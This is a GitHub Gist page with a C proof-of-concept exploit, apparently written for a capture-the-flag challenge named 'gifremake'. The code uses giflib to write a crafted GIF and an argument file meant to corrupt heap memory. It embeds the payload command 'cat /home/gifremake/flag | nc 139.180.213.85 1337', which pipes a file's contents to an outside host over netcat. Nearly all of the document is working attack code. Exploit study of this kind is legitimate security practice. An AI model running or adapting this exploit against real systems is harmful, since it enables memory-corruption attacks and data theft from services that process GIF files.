Last active
April 8, 2019 11:10
-
-
Save nghiadt1098/5571cf51c21574389f9fa1005d9b3c53 to your computer and use it in GitHub Desktop.
poc.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <fcntl.h> | |
| #include <stdbool.h> | |
| #include "getopt.h" | |
| #include "getarg.h" | |
| #include "gif_lib.h" | |
| #define PROGRAM_NAME "gen" | |
| #define MAX_OPERATIONS 256 | |
| #define MAX_IMAGES 2048 | |
| unsigned char hexData[120] = { | |
| 0x60, //1 | |
| 0x11, 0x11, 0x11, 0x11, | |
| 0x11, 0x11, 0x11, 0x11, | |
| 0x11, 0x11, 0x11, 0x11, | |
| 0x05, 0x00, 0x08, 0x00, | |
| 0x40, | |
| 0x00, 0x00, 0x00, 0x00, | |
| 0x20, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, | |
| 0x20, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, | |
| 0x20, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, | |
| 0x60, | |
| 0x11, 0x11, 0x11, 0x11, | |
| 0x11, 0x11, 0x11, 0x11, | |
| 0x11, 0x11, 0x11, 0x11, | |
| }; | |
| int ImageCount=0; | |
| GifFileType *GifFileIn, *GifFileOut = (GifFileType *)NULL; | |
| void call_malloc(int size,char * buf){ | |
| char * addr=malloc(size); | |
| printf("Added index %d\n",ImageCount); | |
| SavedImage * sp=&GifFileOut->SavedImages[ImageCount]; | |
| ImageCount++; | |
| sp->ImageDesc.ColorMap = 0; | |
| sp->ImageDesc.Left=0; | |
| sp->ImageDesc.Top=0; | |
| sp->ImageDesc.Width=size; | |
| sp->ImageDesc.Height=1; | |
| sp->ImageDesc.Interlace = false; | |
| sp->RasterBits =addr; | |
| memcpy(sp->RasterBits ,buf,size); | |
| } | |
| void call_calloc_malloc(int sizem,int sizec,char * buf){ | |
| printf("Added index %d\n",ImageCount); | |
| SavedImage * sp=&GifFileOut->SavedImages[ImageCount]; | |
| ImageCount++; | |
| sp->ImageDesc.ColorMap =GifMakeMapObject(sizec,"Ahihihihi"); | |
| sp->ImageDesc.Left=0; | |
| sp->ImageDesc.Top=0; | |
| sp->ImageDesc.Width=sizem; | |
| sp->ImageDesc.Height=1; | |
| sp->ImageDesc.Interlace = false; | |
| sp->RasterBits =(unsigned char *) malloc(sizem); | |
| memcpy(sp->RasterBits,buf,8); | |
| } | |
| int main(int argc, char **argv, char **envp) | |
| { | |
| int ErrorCode, i; | |
| FILE * f=fopen("args","wb"); | |
| fwrite(hexData,1,120,f); | |
| fclose(f); | |
| system("rm -rf ./test.gif"); | |
| GifFileOut = EGifOpenFileName("test.gif", true, &ErrorCode); | |
| GifFileOut->SWidth = 48; | |
| GifFileOut->SHeight = 1; | |
| GifFileOut->SColorResolution = 1; | |
| GifFileOut->SBackGroundColor = 0; | |
| GifFileOut->Image.Left=0; | |
| GifFileOut->Image.Top=0; | |
| GifFileOut->Image.Width=48; | |
| GifFileOut->Image.Height=1; | |
| GifFileOut->Image.Interlace = false, | |
| GifFileOut->Image.ColorMap = 0x0; | |
| GifFileOut->ImageCount=4; | |
| GifFileOut->SColorMap = GifMakeMapObject(256,"111111111111111"); | |
| GifFileOut->SavedImages = (SavedImage *)malloc(sizeof(SavedImage)*GifFileOut->ImageCount); | |
| call_malloc(96+32,"cat /home/gifremake/flag | nc 139.180.213.85 1337\x00"); | |
| call_malloc(96+32,"cat /home/gifremake/flag | nc 139.180.213.85 1337\x00"); | |
| call_calloc_malloc(96+32,256,"\x20\xB1\x40\x00\x00\x00\x00"); | |
| call_calloc_malloc(96,256,"Test"); | |
| printf("Size : %d\n",ImageCount); | |
| if (EGifSpew(GifFileOut) == GIF_ERROR) | |
| PrintGifError(GifFileOut->Error); | |
| puts("Successfully"); | |
| } | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment